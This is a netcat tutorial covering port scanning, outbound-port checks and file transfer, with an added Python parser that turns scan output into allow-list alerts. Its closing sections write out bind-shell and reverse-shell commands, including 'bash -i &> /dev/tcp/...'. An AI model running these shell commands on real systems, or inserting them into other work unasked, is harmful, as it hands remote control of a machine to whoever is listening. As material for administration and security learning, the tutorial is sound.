nc: the Swiss army knife of networking tools
The nc command (full name: netcat) reads and writes data over TCP, UDP or Unix domain socket (UDS) connections. It can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, and perform port scans, and it supports both IPv4 and IPv6. Unlike Telnet, nc is easy to drive from scripts.
nc [-hlnruz] [-g<gateway...>] [-G<pointer>] [-i<delay seconds>] [-o<output file>] [-p<local port>]
   [-s<source address>] [-v...] [-w<timeout seconds>] [hostname] [port...]
-4                    Use IPv4 only.
-6                    Use IPv6 only.
-c                    Use TLS to connect or listen.
-D                    Enable socket debugging.
-g <gateway>          Set loose source-routing hop gateways; up to 8 may be given.
-G <pointer>          Set the source-routing pointer; the value is a multiple of 4.
-h                    Online help.
-i <delay seconds>    Delay between lines sent and between ports scanned.
-l                    Listen mode: wait for an inbound connection instead of initiating one.
-n                    Numeric-only: use IP addresses directly and skip DNS resolution.
-o <output file>      Dump the transferred data as a hex dump into the given file.
-p <local port>       Set the local port used by this host.
-r                    Randomize the local and remote ports used.
-s <source address>   Set the local IP address from which packets are sent.
-u                    Use UDP instead of TCP.
-v                    Verbose: report what nc is doing as it runs.
-w <timeout seconds>  Timeout for connection attempts.
-z                    Zero-I/O mode; only used when scanning ports.
TCP port scanning
[root@localhost ~]# nc -v -z -w2 192.168.0.3 1-100 # Scan ports 1-100 on 192.168.0.3
192.168.0.3: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.3] 80 (http) open
(UNKNOWN) [192.168.0.3] 23 (telnet) open
(UNKNOWN) [192.168.0.3] 22 (ssh) open
UDP port scanning
[root@localhost ~]# nc -u -z -w2 192.168.0.3 1-1000 # Scan UDP ports 1-1000 on 192.168.0.3
Scanning a specific port
[root@localhost ~]# nc -nvv 192.168.0.1 80 # Check port 80
(UNKNOWN) [192.168.0.1] 80 (?) open
y # User input: the connection is open, so anything typed is sent to the remote service
Check whether outbound port 443 from the server to the destination is blocked by the firewall
nc -vz acme-v02.api.letsencrypt.org 443 -w2
# Ncat: Version 7.50 (https://nmap.org/ncat)
# Ncat: Connected to 23.77.214.183:443.
# Ncat: 0 bytes sent, 0 bytes received in 0.07 seconds.
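The two output formats shown above (the traditional nc "(UNKNOWN) [ip] port (service) open" lines from a -z scan, and Ncat's "Connected to ip:port." line from the outbound-443 check) are worth parsing when nc is run as a recurring check of which ports a host actually exposes. The following parser is an added example, not code from this page; the sample output it consumes is constructed from the lines above, and the per-host allow-list format is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Traditional nc -v -z line, e.g. "(UNKNOWN) [192.168.0.3] 80 (http) open"
NC_LINE = re.compile(r"^\((?P<host>[^)]*)\)\s+\[(?P<ip>[^\]]+)\]\s+(?P<port>\d+)\s+\((?P<service>[^)]*)\)\s+(?P<state>\w+)")
# Ncat line, printed only when the TCP connect succeeded, e.g. "Ncat: Connected to 23.77.214.183:443."
NCAT_LINE = re.compile(r"^Ncat: Connected to (?P<ip>[^:\s]+):(?P<port>\d+)\.?$")

@dataclass(frozen=True)
class PortResult:
    ip: str
    port: int
    state: str
    service: Optional[str] = None  # None when nc printed "(?)" or Ncat gave no service name

def parse_line(line: str) -> Optional[PortResult]:
    """Parse one output line; return None for noise (lookup failures, byte counts, version banners)."""
    line = line.strip()
    m = NC_LINE.match(line)
    if m:
        svc = m.group("service")
        return PortResult(m.group("ip"), int(m.group("port")), m.group("state"), None if svc == "?" else svc)
    m = NCAT_LINE.match(line)
    return PortResult(m.group("ip"), int(m.group("port")), "open") if m else None

def open_ports(output: str) -> Dict[str, List[int]]:
    """Open ports grouped by IP and sorted, ready to diff against an expected baseline."""
    grouped: Dict[str, List[int]] = {}
    for line in output.splitlines():
        r = parse_line(line)
        if r is not None and r.state == "open":
            grouped.setdefault(r.ip, []).append(r.port)
    return {ip: sorted(ports) for ip, ports in grouped.items()}

def unexpected_ports(output: str, allowed: Dict[str, Set[int]]) -> Dict[str, List[int]]:
    """Open ports missing from the per-host allow-list (a host absent from the list allows nothing)."""
    extra = {ip: [p for p in ports if p not in allowed.get(ip, set())] for ip, ports in open_ports(output).items()}
    return {ip: ports for ip, ports in extra.items() if ports}

# Constructed sample: the scan lines and the Ncat line shown on this page, concatenated
SAMPLE_OUTPUT = """\
192.168.0.3: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.3] 80 (http) open
(UNKNOWN) [192.168.0.3] 23 (telnet) open
(UNKNOWN) [192.168.0.3] 22 (ssh) open
(UNKNOWN) [192.168.0.1] 80 (?) open
Ncat: Connected to 23.77.214.183:443.
"""
```

Feeding the saved output of a scheduled scan to unexpected_ports with the host's intended exposure as the allow-list turns a one-off nc check into a drift alert.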
File transfer
# The receiver first starts a listener on a port and names the file to write (any file name will do):
nc -lp 8888 > node.tar.gz
# The sender then streams the file to it:
nc -nv 192.168.75.121 8888 < node_exporter-1.3.1.linux-amd64.tar.gz
# ⚠️ Note: 192.168.75.121 is the receiver's IP address.
# To have nc exit automatically once the transfer is complete, use:
nc -lp 8888 > node.tar.gz
nc -nv 192.168.75.121 8888 -i 1 < node_exporter-1.3.1.linux-amd64.tar.gz
# ⚠️ Note: -i sets the idle timeout.
Remote control
# Forward connection: the controlled host opens a listening port that serves a bash shell, and the controlling host connects to it. If a firewall sits in between, the port must be opened on it or the connection will be dropped.
# On the controlled host:
nc -lvnp 8888 -c bash
# On the controlling host:
nc 192.168.75.121 8888
# Reverse connection: the controlling host opens a listening port, and the controlled host connects out to that IP and port and provides a bash shell.
# On the controlling host:
nc -lvnp 8888
# On the controlled host:
nc 192.168.75.121 8888 -c bash
Reverse shell
# On the controlling host:
nc -lvnp 8888
# On the controlled host:
bash -i &> /dev/tcp/192.168.75.121/8888 0>&1